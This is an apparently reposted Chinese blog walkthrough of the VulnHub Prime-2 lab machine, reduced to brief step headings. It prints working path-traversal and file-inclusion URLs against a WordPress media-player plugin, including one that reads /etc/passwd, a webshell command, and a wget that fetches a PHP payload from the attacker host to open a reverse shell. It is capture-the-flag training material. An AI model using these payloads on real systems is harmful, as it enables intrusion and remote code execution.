vulnhub靶机Prime-2

2023-12-13 17:37:32

下载地址:Prime (2021): 2 ~ VulnHub

主机发现

目标145

端口扫描

端口服务扫描

漏洞扫描

先去看一下80

扫目录

发现点不一样的

Wordpress(记住还是要用api)

好洞出来了看看利用方法

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

成了,这边没什么线索了。去另外一个web看看

看看文件一个一个看吧

在uploads里面

一句话木马

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=whoami

反弹shell

http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=wget%20http://192.168.21.131:8000/1.php%20-O%20/tmp/1.php?编辑

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home//jarves/upload/shell.php&cmd=cat /tmp/1.php

写入成功

包含shell

192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../tmp/1.php

Smb去看一下,一直没用,肯定有用

直接ssh密钥生成

远程登入

免密登入成功

啥也没有

构建

新的文件上传就可以

进容器

结束

文章来源:https://blog.csdn.net/m0_73248913/article/details/134909683
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。